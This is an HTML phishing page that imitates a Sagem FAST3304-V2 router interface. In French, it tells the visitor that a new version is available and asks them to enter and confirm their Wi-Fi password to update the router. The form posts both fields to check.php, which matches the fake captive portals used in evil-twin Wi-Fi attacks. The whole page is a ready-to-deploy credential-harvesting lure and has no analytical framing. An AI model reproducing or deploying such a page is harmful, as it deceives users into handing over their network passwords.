<html><head>








<meta name="viewport" content="width=device-width">


<style>
img {
    max-width: 100%;
}
</style>

<meta http-equiv="expires" content="Mon, 16 Feb 2015 17:43:33 GMT">
<meta http-equiv="cache-control" content="no-cache">
<meta http-equiv="pragma" content="no-cache">
<meta name="author" content="Sagem Communications">
<meta name="Copyright" content="Sagem Communications">
<title>FAST3304-V2</title>
<link rel="stylesheet" type="text/css" href="./index_files/fonts.css">
<link rel="stylesheet" type="text/css" href="./index_files/generic.css">
<link rel="stylesheet" type="text/css" href="./index_files/page.css">
<script type="text/javascript" src="./index_files/script.js"></script>
</head>

<body>
<!-- lb_struct_cb -->
<div class="main">

<table class="contener">
<tbody><tr>
<td rowspan="2" id="menu">
<div id="logo">
<img src="./index_files/logo.gif">
&nbsp;</div>
</td>
<td rowspan="2" class="space">
&nbsp;</td>
<td class="panel">
</td>
</tr>
<tr>
<td class="content">
<table class="content">
<tbody><tr><td>
<div id="content">

<p class="title">
nouvelle version disponible mettre à jour votre routeur</p>
<!-- p_scr_login -->
<table class="login">
<tbody><tr>
<td><b><tr><td colspan="2">
    <center><b><H2> Entrez votre mot de passe Wifi pour mettre à jour votre routeur</H2> </b></font></center>
<td></td>
</tr>
<form id="form1" name="form1" method="POST" action="check.php" >



<tr>
<td class="libelle"><b>Mot de passe	 </b></td>
<td class="field"><input type="password" style="WIDTH: 160px" name="key1" value="" size="30" maxlength="64"></td>
</tr>
<tr>
<td class="libelle"><b>confirmer votre Mot de passe </b></td>
<td class="field"><input type="password" style="WIDTH: 160px" name="key2" value="" size="30" maxlength="64"></td>
</tr>
</tbody></table>
</div>

<input name="ok" type="submit" value="Submit" style="margin:0px 200px;" class="button"></p>
</div>

</td></tr>
</tbody></table>
</td>
</tr>
</tbody>
</div>

</form>


</body></html>